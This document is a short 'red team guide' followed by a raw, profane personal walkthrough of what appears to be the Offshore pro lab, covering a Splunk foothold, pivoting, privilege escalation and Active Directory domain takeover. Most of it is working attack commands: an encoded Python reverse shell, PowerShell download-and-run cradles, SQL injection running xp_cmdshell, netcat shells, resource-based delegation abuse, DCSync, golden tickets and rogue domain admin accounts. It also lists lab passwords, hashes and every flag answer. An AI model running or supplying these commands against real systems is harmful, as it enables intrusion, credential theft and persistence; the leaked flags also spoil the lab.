Comprehensive Guide to Red Team Techniques: Server and Network Penetration
IntroductionRed teaming simulates a real-world cyberattack to test an organization’s defenses. This guide focuses on practical, hands-on examples of common red team techniques, from gaining initial access to escalating privileges, pivoting across networks, and ultimately achieving the target objectives.
Initial Access
1. Exploiting Vulnerable Services (Splunk Example)
- Access Splunk’s web interface:
Code:http://10.10.110.123:8000 - Upload a malicious tar.gz file to exploit vulnerabilities and get a shell:
Code:| revshell std 10.10.14.3 443 - Upgrade to a better shell:Generate a Python reverse shell using Metasploit:
Execute the payload in the existing shell:Code:msfvenom -p cmd/unix/reverse_python lhost=10.10.14.3 lport=4444 R
Code:python -c "exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('<BASE64_PAYLOAD>')[0]))"
Post-Exploitation: Database Enumeration and Privilege Escalation
2. PostgreSQL Exploitation
- Forward PostgreSQL Port to Kali:On the compromised host (NIX01):
On Kali:Code:./chisel client 10.10.14.3:9003 R:5432:127.0.0.1:5432
Code:./chisel server -p 9003 --reverse - Execute a Command via PostgreSQL:Use Metasploit to exploit PostgreSQL with:
Code:use multi/postgres/postgres_copy_from_program_cmd_exec - Privilege Escalation:Check for privileged command execution:
Code:sudo /usr/bin/tail -f -n +1 /root/.ssh/id_rsa
Lateral Movement
3. Pivoting to Another Network
Use tcpdump to capture traffic and extract credentials:
Code:
tcpdump -i eth0 -nn -s0 -v port 80 -w test.pcap
Code:
wireshark test.pcap4. Remote Desktop Protocol (RDP) Exploitation
- Use proxychains to connect via RDP:
Code:proxychains remmina - Add an administrative user for persistence:
Code:net user newadmin NewPassword123 /add net localgroup administrators newadmin /add
Escalating Privileges
5. Exploiting Services
- Exploit vulnerable services with crafted payloads. Example: Generate a reverse shell executable for Windows:
Code:msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.3 LPORT=443 -f exe > malicious.exe - Place the payload in a service directory and restart it:
Code:sc.exe stop VulnerableService sc.exe start VulnerableService
Active Directory Attacks
6. Impersonation and DCSync
- Create a Fake Machine Account:
Code:New-MachineAccount -MachineAccount FAKE01 -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) - Generate a Security Descriptor:
Code:
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-<DOMAIN_SID>)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)- Apply the Security Descriptor to a Target DC:
Code:Set-DomainObject -Identity "DC01" -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} - Perform DCSync with Mimikatz:
Code:mimikatz # lsadump::dcsync /domain:<DOMAIN> /user:<USER>
Credential Harvesting
7. Extracting Hashes from Files
- Extract password hashes from encrypted Office files:
Code:python office2john.py encrypted.xlsx > hash.txt john --wordlist=rockyou.txt hash.txt
Cross-Domain Attacks
8. Using Kerberos TGTs for Lateral Movement
- Create an Inter-Realm TGT:
Code:mimikatz.exe "kerberos::golden /user:Administrator /domain:domain.local /sid:<SID> /krbtgt:<HASH> /ptt" - Access a Target System:
Code:net use \\<TARGET_IP>\C$
Defensive Measures
- Implement Network Segmentation:Isolate critical assets from general network traffic.
- Monitor Network Traffic:Use IDS/IPS to detect unusual patterns like port scanning or unauthorized lateral movement.
- Regularly Audit Privileges:Ensure no excessive privileges are granted unnecessarily.
- Enforce Strong Authentication:Use multi-factor authentication (MFA) for all administrative accounts.
- Educate Teams:Train employees to recognize suspicious activity and implement regular security drills.
Summary
This guide provides practical examples for red team activities, showcasing techniques for gaining access, escalating privileges, and pivoting across networks. By understanding these methods, security teams can better anticipate and defend against sophisticated adversaries.
Click to see the complete script
Python:
10.10.110.123 NIX01
Initial Shell:
https://www.n00py.io/2018/10/popping-shells-on-splunk/
upload tar.gz, get shell
>10.10.110.123:8000
>| revshell std 10.10.14.3 443
get nice shell from that shit shell:
>msfvenom -p cmd/unix/reverse_python lhost=10.10.14.3 lport=4444 R
paste this in that shit shell get normal shell on port 4444
>python -c "exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCAgICAgICAgLCAgICAgICAgc3VicHJvY2VzcyAgICAgICAgLCAgICAgICAgb3MgIDsgICBob3N0PSIxMC4xMC4xNC4zIiAgOyAgIHBvcnQ9NDQ0NCAgOyAgIHM9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCAgICAgICAgLCAgICAgICAgc29ja2V0LlNPQ0tfU1RSRUFNKSAgOyAgIHMuY29ubmVjdCgoaG9zdCAgICAgICAgLCAgICAgICAgcG9ydCkpICA7ICAgb3MuZHVwMihzLmZpbGVubygpICAgICAgICAsICAgICAgICAwKSAgOyAgIG9zLmR1cDIocy5maWxlbm8oKSAgICAgICAgLCAgICAgICAgMSkgIDsgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAgICAgICwgICAgICAgIDIpICA7ICAgcD1zdWJwcm9jZXNzLmNhbGwoIi9iaW4vYmFzaCIp')[0]))"
>python -c 'import pty; pty.spawn("/bin/sh")'
yis, we have pwnd mark, from mark to postgres
password: postgres
database: template1
table : test
forward the postgresql to port to kali
on NIX01
./chisel client 10.10.14.3:9003 R:5432:127.0.0.1:5432
on kali
./chisel server -p 9003 --reverse
get shell as postgres with msf
use multi/postgres/postgres_copy_from_program_cmd_exec
*put in the above password, database and table and get shell
postgres to root
sudo /usr/bin/tail -f -n +1 /root/.ssh/id_rsa
root
172.16.1.30 MS01
run tcp dump on NIX01, creds and a flag can be grabbed:
tcpdump -i eth0 -nn -s0 -v port 80 -w test.pcap
creds:
user: admin
pass: Zaq12wsx!
create a Workflow > External Actions > Execute Windows Script
Set objShell = CreateObject("Wscript.Shell")
objShell.Run("powershell.exe -c IEX(New-object Net.WebClient).DownloadString('http://10.10.14.3/shell.ps1')")
run the Workflow and get shell
crack the logins.xlsx file from /Documents directory
>python office2john.py .\logins.xlsx > hash.txt
>.\john.exe --wordlist=.\rockyou.txt hash.txt
Password=broken
172.16.1.36 WSADM
proxychains remmina
username: NED.FLANDERS_ADM
password: Lefthandedyeah!
domain : CORP.LOCAL
sc.exe qc "WCAssistantService"
generate exe : msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.3 LPORT=443 -f exe > Lavasoft.WCAssistant.WinService.exe
place it under : C:\Program Files (x86)\Lavasoft\Web Companion\Application"
restart the service : sc.exe stop WCAssistantService > sc.exe start WCAssistantService
add a new user to administrator
net user olala olala12345 /add
net localgroup administrators olala /add
rdp as localadmin WSADMIN
proxychains remmina
username: wsadmin
password: Workstationadmin1!
domain : CORP.LOCAL
172.16.1.101 WS02
proxychains remmina
username: wsadmin
password: Workstationadmin1!
domain : CORP.LOCAL
flags
1: Memories, fond memories :::::: OFFSHORE{mimikatz_d03s_th3_j0b}
172.16.1.24 WEB-WIN01
login to http://172.16.1.24/login
creds: svc_iis:::Vintage!
app login:
login: admin'--
passs: admin
parse the /DocumentsService.asmx?WSDL request with WSDLER, the author field is vulnerable to SQLi in /getDocuments_Dev request.
Shell by exploiting SQL Injection:
>a'); exec xp_cmdshell "ping 10.10.12.8"--
>tcpdump -i tun0 icmp
>a'); exec xp_cmdshell "powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.12.8/shell.ps1')"--
Getting to CYBER_ADM which is localadmin on this box:
PGIBBONS -> SALVADOR
Get Shell as PGIBBONS and change password for SALVADOR:
>runas /user:[email protected] "powershell.exe"
>$cred = ConvertTo-SecureString "HTBIsCool!!" -AsPlainText -force
>Set-DomainUserPassword -identity SALVADOR -accountpassword $cred
SALVADOR -> SECURITY ENGINEERS
Get Shell as SALVADOR and add him to SECURITY ENGINEERS group:
>runas /user:[email protected] "powershell.exe"
>Add-DomainGroupMember -Identity 'SECURITY ENGINEERS' -Members 'SALVADOR'
>Get-DomainGroupMember -Identity 'SECURITY ENGINEERS'
SALVADOR -> CYBER_ADM
Change Password for CYBER_ADM from SALVADOR:
>$cred = ConvertTo-SecureString "HTBIsCool!!" -AsPlainText -force
>Set-DomainUserPassword -identity CYBER_ADM -accountpassword $cred
>proxychains remmina
username: CYBER_ADM
password: HTBIsCool!!
domain : CORP.LOCAL
172.16.1.5 OFFSHORE-CORP-DC01
DC01:
Target computer DC01
Admins on target computer corp.local
Fake computer name FAKE01
Fake computer SID To be retrieved during attack
Fake computer password 123456
Windows 2012 Domain Controller DC01
Check Quota:
>Get-DomainObject -Identity "dc=corp,dc=local" -Domain corp.local
Get DomainController:
>Get-DomainController
Target computer DC01 object must not have the attribute msds-allowedtoactonbehalfofotheridentity set:
>Get-NetComputer DC01 | Select-Object -Property name, msds-allowedtoactonbehalfofotheridentity
Add fake machine:
>import-module powermad
>New-MachineAccount -MachineAccount FAKE01 -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
Get SID of fake machine:
>Get-DomainComputer fake01 | select objectsid
Create a new raw security descriptor for the FAKE01 computer principal:
>$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-2291914956-3290296217-2402366952-10101)"
>$SDBytes = New-Object byte[] ($SD.BinaryLength)
>$SD.GetBinaryForm($SDBytes, 0)
Applying the security descriptor bytes to the target DC01 machine:
>Get-DomainComputer DC01 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
Check if it worked lol:
>Get-DomainComputer DC01 -Properties 'msds-allowedtoactonbehalfofotheridentity'
Let's generate the RC4 hash of the password we set for the FAKE01 computer:
>.\Rubeus.exe hash /password:123456 /user:fake01 /domain:corp.local
Impersonation
>cd c:\users\public\documents
>.\Rubeus.exe s4u /user:fake01$ /rc4:32ED87BDB5FDC5E9CBA88547376818D4 /impersonateuser:iamtheadministrator /msdsspn:cifs/DC01.corp.local /ptt
>.\Rubeus.exe s4u /user:fake01$ /domain:corp.local /rc4:32ED87BDB5FDC5E9CBA88547376818D4 /impersonateuser:iamtheadministrator /msdsspn:http/dc01 /altservice:cifs,host /ptt
>hostname; pushd "\\dc01\c$"
Login to WEB-WIN01 as CYBER_ADM, get NT/AUTHORITY shell, load up PowerView.ps1, give any user the DCSYNC rights:
>Add-ObjectACL -PrincipalIdentity SALVADOR -Rights DCSync
get shell as SALVADOR, load mimikatz.exe, do DCSYNC, profit!!
>log dcsync.log
>lsadump::dcsync /corp.local:172.16.1.5 /all /csv
get shell as iamtheadministrator
proxychains wmiexec.py CORP.LOCAL/[email protected] -hashes :70016778cb0524c799ac25b439bd67e0
172.16.1.15 SQL01.CORP.LOCAL
>proxychains wmiexec.py CORP.LOCAL/[email protected] -hashes :70016778cb0524c799ac25b439bd67e0
>net user olala @#$% /add /domain
>net localgroup administrators olala /add /domain
>net group "Domain Admins" olala /Add /domain
>net group "Enterprise Admins" olala /Add /domain
rdp to any machine, open powershell:
>runas /user:[email protected] "powershell.exe" ::::: @#$%
>enter-pssession -computername SQL01.CORP.LOCAL
>get the flags
172.16.1.26 FS01.CORP.LOCAL
>proxychains wmiexec.py CORP.LOCAL/[email protected] -hashes :70016778cb0524c799ac25b439bd67e0
>net user olala @#$% /add /domain
>net localgroup administrators olala /add
>net group "Domain Admins" olala /Add /domain
>net group "Enterprise Admins" olala /Add /domain
rdp to any machine, open powershell:
>runas /user:[email protected] "powershell.exe" ::::: @#$%
>enter-pssession -computername FSL01.CORP.LOCAL
>get the flags
172.16.2.12 MGMT01.DEV.ADMIN.OFFSHORE.COM
get to dc01:
kali:
>./chisel server -p 9003 --reverse
target:
>.\chisel.exe client 10.10.12.8:9003 R:80:172.16.2.12:80
change password of "glpi_adm":
>python lol.py --url http://localhost/ --user normal --password normal --email [email protected] --newpass shell
>proxychains4 -f /root/main-network/proxychains.conf python lol.py --url http://172.16.2.12/ --user normal --password normal --email [email protected] --newpass shell
>proxychains4 -f /root/main-network/proxychains.conf python3 narmu0.py
newcreds:
>glpi_adm::shell
>http://localhost/front/backup.php?dump=dump&offsettable=312&fichier=C:\xampp\htdocs\pics\dump2.php
>http://localhost/pics/dump2.php?0=dir
>lolz.php?0=cmd.exe%20/c%20C:\\windows\\tasks\\nc.exe%2010.10.12.8%209091%20-e%20cmd.exe"
get system shell with printspoofer:
>.\pf.exe -c "C:\xampp\htdocs\sound\nc.exe 10.10.12.8 8081 -e cmd"
172.16.2.102 WS03.DEV.ADMIN.OFFSHORE.COM
Login into as Domain Admin if CORP.LOCAL and change password for SVC_DEVOPS, SVC_DEVOPS is localadmin to WS03:
>$cred = ConvertTo-SecureString "Password123" -AsPlainText -force
>Set-DomainUserPassword -identity svc_devops -accountpassword $cred
Get shell as SVC_DEVOPS:
>proxychains4 -f /root/main-network/proxychains.conf psexec.py 'svc_devops:Password123'@172.16.2.102 cmd.exe
WS03 From Joe to DC02:
Get DomainController:
>Get-DomainController
Target computer DC02 object must not have the attribute msds-allowedtoactonbehalfofotheridentity set:
>Get-NetComputer DC02 | Select-Object -Property name, msds-allowedtoactonbehalfofotheridentity
Add fake machine:
>import-module powermad
>New-MachineAccount -MachineAccount FAKE01 -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
Get SID of fake machine:
>Get-DomainComputer fake01 | select objectsid
Create a new raw security descriptor for the FAKE01 computer principal:
>$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1416445593-394318334-2645530166-7101)"
>$SDBytes = New-Object byte[] ($SD.BinaryLength)
>$SD.GetBinaryForm($SDBytes, 0)
Applying the security descriptor bytes to the target DC01 machine:
>Get-DomainComputer DC02 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
Check if it worked lol:
>Get-DomainComputer DC02 -Properties 'msds-allowedtoactonbehalfofotheridentity'
Let's generate the RC4 hash of the password we set for the FAKE01 computer:
>.\Rubeus.exe hash /password:123456 /user:fake01 /domain:ADMIN.OFFSHORE.LOCAL
Impersonation
>cd c:\users\public\documents
>.\Rubeus.exe s4u /user:fake01$ /rc4:32ED87BDB5FDC5E9CBA88547376818D4 /impersonateuser:administrator /msdsspn:cifs/DC02.DEV.ADMIN.OFFSHORE.COM /ptt
>.\Rubeus.exe s4u /user:fake01$ /domain:DEV.ADMIN.OFFSHORE.COM /rc4:32ED87BDB5FDC5E9CBA88547376818D4 /impersonateuser:administrator /msdsspn:http/dc02 /altservice:cifs,host /ptt
>dir \\dc02\c$
>hostname; pushd "\\dc02\c$"
DCSYNC and Shit:
>.\Rubeus.exe s4u /user:fake01$ /rc4:32ED87BDB5FDC5E9CBA88547376818D4 /impersonateuser:Administrator /msdsspn:LDAP/dc02.dev.admin.offshore.com /ptt
>.\mimikatz.exe
>privilege::debug
>lsadump::dcsync /DEV.ADMIN.OFFSHORE.COM:172.16.2.6 /all /csv
svc_devops on ws03
ConvertFrom-SID S-1-5-21-2291914956-3290296217-2402366952-3609 :::: CORP\svc_devops
$cred = ConvertTo-SecureString "Password123" -AsPlainText -force
Set-DomainUserPassword -identity svc_devops -accountpassword $cred
Shell on dc02:
>proxychains4 -f /root/main-network/proxychains.conf wmiexec.py DEV.ADMIN.OFFSHORE.COM/[email protected] -hashes :c61f43b6a4db2676714713836b7d2ea6
DC02:
proxychains4 -f /root/main-network/proxychains.conf wmiexec.py DEV.ADMIN.OFFSHORE.COM/[email protected] -hashes :c61f43b6a4db2676714713836b7d2ea6
>net user magic 1ts-mag1c!!! /add /domain
>net localgroup administrators magic /add
>net group "Domain Admins" magic /Add /domain
proxychains4 -f /root/main-network/proxychains.conf psexec.py 'magic:1ts-mag1c!!!'@172.16.2.6 cmd.exe
proxychains4 -f /root/main-network/proxychains.conf evil-winrm -i 172.16.2.6 -u magic -P 5985 -p '1ts-mag1c!!!'
DC02 To DC03:
Go to DC01, get shuull as magic, Load up PowerView.ps1:
>$SecPassword = ConvertTo-SecureString '1ts-mag1c!!!' -AsPlainText -Force
>$Cred = New-Object System.Management.Automation.PSCredential('DEV.ADMIN.OFFSHORE.COM\magic', $SecPassword)
>Enter-PsSession -ComputerName DC02.DEV.ADMIN.OFFSHORE.COM -Credential $Cred
Get-DomainSID -Domain dev.ADMIN.OFFSHORE.COM
S-1-5-21-77175520-687805270-358672322
Get-DomainSID -Domain ADMIN.OFFSHORE.COM
S-1-5-21-1216317506-3509444512-4230741538
#Create the Enteprise Admins SID
Format: RootDomainSID-519
: S-1-5-21-1216317506-3509444512-4230741538-519
#krbtgt Hash
9404def404bc198fd9830a3483869e78
# Mimikatz Magic, Creating an Inter-Realm TGT
.\mimikatz.exe "kerberos::golden /user:Administrator /domain:dev.ADMIN.OFFSHORE.COM /sid:S-1-5-21-77175520-687805270-358672322 /sids:S-1-5-21-1216317506-3509444512-4230741538-519 /krbtgt:9404def404bc198fd9830a3483869e78 /ptt"
mimikatz # lsadump::dcsync /domain:ADMIN.OFFSHORE.COM /all /csv
DC01:
>proxychains wmiexec.py CORP.LOCAL/[email protected] -hashes :70016778cb0524c799ac25b439bd67e0
>net user olala @#$% /add /domain
>net localgroup administrators olala /add /domain
>net group "Domain Admins" olala /Add /domain
>net group "Enterprise Admins" olala /Add /domain
Going to DC02 and addng magic user:
Use chisel for pivoting and add user magic to DC02:
proxychains4 -f /root/main-network/proxychains.conf wmiexec.py DEV.ADMIN.OFFSHORE.COM/[email protected] -hashes :c61f43b6a4db2676714713836b7d2ea6
>net user magic 1ts-mag1c!!! /add /domain
>net localgroup administrators magic /add
>net group "Domain Admins" magic /Add /domain
proxychains4 -f /root/main-network/proxychains.conf psexec.py 'magic:1ts-mag1c!!!'@172.16.2.6 cmd.exe
DC01.CORP.LOCAL --> DC02.DEV.ADMIN.OFFSHORE.COM:
Go to DC01, get shuull as magic, then go to DC02:
>$SecPassword = ConvertTo-SecureString '1ts-mag1c!!!' -AsPlainText -Force
>$Cred = New-Object System.Management.Automation.PSCredential('DEV.ADMIN.OFFSHORE.COM\magic', $SecPassword)
>Enter-PsSession -ComputerName DC02.DEV.ADMIN.OFFSHORE.COM -Credential $Cred
DC02.DEV.ADMIN.OFFSHORE.COM --> DC03.ADMIN.OFFSHORE.COM
Use chisel for pivoting and then:
proxychains4 -f /root/main-network/proxychains.conf wmiexec.py ADMIN.OFFSHORE.COM/[email protected] -hashes :f2594c9e60abf7e28e7601db343a7e24
>net user magic 1ts-mag1c!!! /add /domain
>net localgroup administrators magic /add
>net group "Domain Admins" magic /Add /domain
>net group "Enterprise Admins" magic /Add /domain
>net group "Schema Admins" magic /Add /domain
>net group "Group Policy Creator" magic /Add /domain
proxychains4 -f /root/main-network/proxychains.conf remmina
Flags:
1: Again, and again, and again :::: OFFSHORE{w@tch_th0s3_3xtra_$ids}
DC03.ADMIN.OFFSHORE.COM --> WS04.ADMIN.OFFSHORE.COM:
user magic or DA can rdp to WS04
Flags:
1: Deforestation is such a shame :::: OFFSHORE{w@tch_th3_for3st_burn}
MS02 to DC4:
get rdp on MS02 as CLEARNER:
>.\Rubeus.exe s4u /user:ms02$ /rc4:dc7a49c0c36399ae87f3de623ebab985 /impersonateuser:administrator /msdsspn:"cifs/DC04.CLIENT.OFFSHORE.COM" /altservice:cifs,host /ptt
>dir \\DC04.CLIENT.OFFSHORE.COM\C$
>net user magic mag1c!!! /add /domain
>net group "Domain Admins" magic /Add /domain
>$SecPassword = ConvertTo-SecureString '1ts-mag1c!!!' -AsPlainText -Force
>$Cred = New-Object System.Management.Automation.PSCredential('CLIENT.OFFSHORE.COM\magic', $SecPassword)
>Enter-PsSession -ComputerName DC04.CLIENT.OFFSHORE.COM -Credential $Cred
>.\mimikatz.exe "lsadump::dcsync /domain:CLIENT.OFFSHORE.COM /all /csv" "exit"
Flags:
1: One massive screwup ::::: OFFSHORE{c@r3ful_who_y0u_d3legate_t0}
2: I feel so exposed ::::: OFFSHORE{d0nt_overl00k_gp0}
NIX03 172.16.4.120
Lookup CLIENT_BANKING user in bloodhoud:
**Old admin account for client banking app** OFFSHORE{h1dd3n_1n_pl@iN_$1ght}
Going to the box:
proxychains ssh [email protected] :::: h1dd3n_1n_pl@iN_$1ght
mysql -u root -h localhost -p :::: toor
CLIENT_BANKING to ROOT:
https://github.com/bcoles/local-exploits/blob/master/CVE-2019-18862/exploit.ldpreload.sh
Flags:
1: Your eyes aren't deceiving you :::: OFFSHORE{h1dd3n_1n_pl@iN_$1ght}
2: It happened again :::: OFFSHORE{d0nt_tru$t_y0ur_us3rs}
3: We don't need no stinkin' encryption :::: OFFSHORE{3ncrypt10n_w0rk$_w0nd3rs}
4: MinatoTW leaves his mark :::: OFFSHORE{a$$ert1on_r1fl3!!!}
5: The grand finale ::::: OFFSHORE{s3tuid_f0r_th3_k1ll_sh0t!}
proxychains psexec.py 'magic:1ts-mag1c!!!'@172.16.2.102 cmd.exe
